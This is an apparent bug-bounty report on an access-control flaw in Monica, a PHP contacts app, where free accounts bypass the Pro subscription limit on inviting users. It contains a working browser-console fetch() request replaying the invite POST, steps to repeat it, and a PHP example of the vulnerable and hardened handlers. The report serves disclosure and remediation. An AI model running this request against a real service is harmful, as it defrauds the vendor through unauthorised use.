monica

vulnerability improper access control - generic (cwe-284)
severity 8.8
language php
registry other

✍️ Description

Payment verification can be bypassed to add more users. A free account is only allowed 1 user, but using this bug a free-account user can add more users without paying.

🕵️‍♂️ Proof of Concept

  1. From a free account, go to https://app.monicahq.com/settings/users and try to invite a new user: the page asks for a Pro subscription. Bypass that prompt by sending the invite request directly, using the request below
// Same POST the invite form would send; only the _token value is per-session.
await fetch("https://app.monicahq.com/settings/users", {
    "credentials": "include",   // send the logged-in session cookie
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    },
    // _token: CSRF token of your own session (replace before running); email: invitee
    "body": "_token=RO5UHOXKg6GWDtSlSpfcQEFtN4Dpo1cwW3ueFMEa&email=mannnn%40localhost.com&confirmation=1",
    "method": "POST",
    "mode": "cors"
});

Replace the _token value in the request body with the CSRF token from your own session, open the browser console on app.monicahq.com and execute the code above: the new user is invited. Repeating the request invites an unlimited number of users for free. See the video PoC below.
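The root cause described above is a subscription limit enforced only in the UI (the invite button shows an upgrade prompt) while the POST handler trusts the request. The following PHP is an added illustration written for this report, not Monica's code: it puts a vulnerable invite handler beside a hardened one that re-checks the plan limit server-side in the same handler that performs the write. The Account class, the 'free'/'pro' plan values, the one-user free limit and the handler names are assumptions.

```php
<?php
// Added illustration, not Monica's code. Names, plan values and the
// one-user free limit are assumptions made for the example.
declare(strict_types=1);

const FREE_PLAN_USER_LIMIT = 1;   // assumption: free plan allows one user

final class Account
{
    public function __construct(
        public string $plan,        // 'free' or 'pro' (hypothetical values)
        public array $users = [],   // e-mail addresses already on the account
    ) {}
}

// Vulnerable pattern: the only server-side gate is the CSRF token. A user
// can read their own token from the page, so replaying the POST from the
// console (as in the PoC) invites users regardless of the plan.
function inviteUserVulnerable(Account $account, string $csrfToken, string $sessionToken, string $email): string
{
    if (!hash_equals($sessionToken, $csrfToken)) {
        return '419 token mismatch';
    }
    $account->users[] = $email;
    return '302 user invited';
}

// Hardened pattern: the plan limit is enforced where the write happens,
// so hiding or bypassing the upgrade prompt in the UI changes nothing.
function inviteUserHardened(Account $account, string $csrfToken, string $sessionToken, string $email): string
{
    if (!hash_equals($sessionToken, $csrfToken)) {
        return '419 token mismatch';
    }
    if (!canInviteMoreUsers($account)) {
        return '403 upgrade to Pro to add more users';
    }
    $account->users[] = $email;
    return '302 user invited';
}

function canInviteMoreUsers(Account $account): bool
{
    if ($account->plan === 'pro') {
        return true;
    }
    return count($account->users) < FREE_PLAN_USER_LIMIT;
}

// Demo: replay the same invite POST three times against a free account
// (constructed sample data) through each handler.
$token = bin2hex(random_bytes(20));
foreach (['inviteUserVulnerable', 'inviteUserHardened'] as $handler) {
    $account = new Account('free', ['owner@example.com']);
    foreach (['a@example.com', 'b@example.com', 'c@example.com'] as $email) {
        printf("%-20s %-14s -> %s\n", $handler, $email, $handler($account, $token, $token, $email));
    }
    printf("  users on account after replay: %d\n", count($account->users));
}
```

Run with `php example.php` (PHP 8.0 or later): the vulnerable handler ends with four users on the free account, the hardened one stays at one and returns 403 for every extra invite. The same check should also be applied wherever the invited user is activated, so that a pending invitation cannot be accepted once the limit has been reached.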

Video PoC:

https://drive.google.com/file/d/1pZuHpx736JuQgX6gjan2sQisfHgGRS0n/view?usp=sharing

💥 Impact

Bypass of the Pro subscription check on /settings/users: a free account, limited to one user, can invite an unlimited number of users without paying.